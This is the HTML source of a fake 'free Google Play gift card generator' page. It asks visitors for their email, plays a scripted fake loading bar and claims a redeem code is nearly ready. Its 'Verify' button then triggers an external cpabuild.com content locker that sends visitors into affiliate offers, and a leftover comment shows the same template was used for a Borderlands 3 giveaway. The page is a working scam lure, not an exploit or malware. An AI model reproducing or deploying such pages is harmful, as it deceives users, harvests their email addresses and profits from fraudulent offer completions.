<!doctype html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="bootstrap.min.css">
    <link rel="stylesheet" href="vegas.min.css">
    <link rel="stylesheet" href="main.css">
    <link rel="icon" type="image/x-icon" href="https://freegiftcard.today/googleplay/img/favicon.png">
    <title>Get Google Play Gift Card for free!</title>
<style>
.progressb{
  background:green;
  height:25px;
  width:90%;
  line-height:25px;
  text-align:right;
  animation:kla 20s ;}
@keyframes kla{
  from{width:0%;background:red;}
  to{width:90%;background:green;}
  } 
</style>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":793076,"key":"e0ddf"};
</script>
<script src="https://cpabuild.com/public/external/locker.js"></script>
</head>

<body>

    <div class="container-fluid">

      <div class="row justify-content-center">

        <div class="col text-center flick-header">

          <div class="WHOA">

            <!--<div class="W40"><h1 class="m-0 p-0 mt-4 TEST1"><CY>Borderlands 3</CY><f700> for free!</f700></h1></div>-->

            <div class="W40"><img src="logo.png" class="img-fluid"></div>

            <br>

            <div class="W40"><h2 class="m-0 p-0 TEST2">Get your <CY class="f700">Google Play</CY> Redeem Code now!</h2></div>

          </div>

        </div>

      </div>

      <div class="row justify-content-center">

        <div class="col-11 col-sm-10 col-md-9 col-lg-7 col-xl-6 text-center GENERATOR">

          <div class="WL"><h1 class="find mt-2 mb-1 TEST3"><CY>Google Play</CY> Redeem Code</h1></div>

          <div class="row justify-content-center">

            <div class="col text-center">

              <div class="W9 S1"><h3 class="pt-sans GT1 mb-3">Type in your Email:</h3></div>

              <input type="email" class="form-control W95 mb-2 S1" placeholder="Your Email" id="GAME">

              <div class="W9"><h3 class="pt-sans GT1 mb-2 S1">Choose your platform:</h3></div>

              <div class="row justify-content-center mb-2 S1">

                <div class="col-11 col-sm-4"><div class="W975 platform WINDOWS" onclick="PCHOOSE('.WINDOWS');">

                  <img class="img-fluid w575" src="5dollar.png">

                </div></div>

                <div class="col-11 col-sm-4"><div class="W975 platform PLAYSTATION" onclick="PCHOOSE('.PLAYSTATION');">

                  <img class="img-fluid w575" src="15dollar.png">

                </div></div>

                <div class="col-11 col-sm-4"><div class="W975 platform XBOX" onclick="PCHOOSE('.XBOX');">

                  <img class="img-fluid w575" src="25dollar.png">

                </div></div>
                <div class="col-11 col-sm-4"><div class="W975 platform 35" onclick="PCHOOSE('.35');">

                  <img class="img-fluid w575" src="35dollar.png">

                </div></div>				

                <div class="col-11 col-sm-4"><div class="W975 platform 50" onclick="PCHOOSE('.50');">

                  <img class="img-fluid w575" src="50dollar.png">

                </div></div>

                <div class="col-11 col-sm-4"><div class="W975 platform 100" onclick="PCHOOSE('.100');">

                  <img class="img-fluid w575" src="100dollar.png">

                </div></div>				
              </div>

              <button type="button" class="btn btn-secondary btn-lg W95 S1" id="GENRES" onclick="CON();">Continue</button>

              <div class="lds-ripple mt-3 mb-3 S2 S1337"><div></div><div></div></div>

              <div class="W95 CCC mb-2 mt-2 S1337">

                <div style=""><div class="CO"><div class="progressb">Loading... </div></div></div>

              </div>

              <h3 class="pt-sans S200 S1337 TEX f400 mb-4"></h3>

              <h2 class="S3 mt-2">Verification</h2>

              <p class="S3">Congrats, you are almost done generating your REDEEM code. Click on the <strong>Verify</strong> button below and follow the steps on the next page! Email will be sent instantly!</p>

              <h5 class="mt-1 f700 S3 tleft"></h5>

              <button type="button" class="btn btn-secondary btn-lg W95 S3" id="GENRES" onclick="CPABuildLock()">Verify</button>

            </div>

          </div>

        </div>

      </div>

    </div>


    <script src="jquery-3.4.1.min.js"></script>
    <script src="popper.min.js"></script>
    <script src="bootstrap.min.js"></script>
    <script src="vegas.min.js"></script>
    <script src="fitty.min.js"></script>
    <script src="main.js"></script>

    <!--LOCKER-->

</body>

</html>
